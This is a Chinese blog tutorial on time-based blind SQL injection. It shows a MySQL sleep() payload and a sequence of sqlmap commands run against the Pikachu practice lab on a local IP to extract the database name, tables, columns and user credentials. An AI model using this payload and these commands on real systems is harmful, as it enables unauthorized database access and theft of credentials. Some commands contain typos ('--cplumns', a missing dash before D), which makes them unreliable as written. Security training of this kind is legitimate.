数据库
首页 > 数据库> > sql注入之时间注入

sql注入之时间注入

作者:互联网

时间注入是盲注入的一种,利用的场景是当目标无法使用布尔盲注获得数据可以使用这种基于时间延迟的注入
利用语法
select if(length(database())>1,sleep(5),0)
这里的意思是数据名的长度如果大于1就延时5秒返回结果
这种注入方式还是使用sqlmap进行利用
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql
这里–technique=T 是指定注入的类型位时间延长注入
在这里插入图片描述
可以看出sqlmap检测出来了,接下来查看当前库名
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --current-db --threads 10 --batch
在这里插入图片描述

当前库名为pikachu,跑表名
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --tables -D pikachu --batch

在这里插入图片描述
列出字段
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --cplumns -T users -D pikachu --batch

出数据
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql -C “username,password” -T users D pikachu – threads 10 --batch

标签:sqlmap,blind,name,--,technique,sqli,时间,sql,注入
来源: https://blog.csdn.net/qq_42307546/article/details/122333797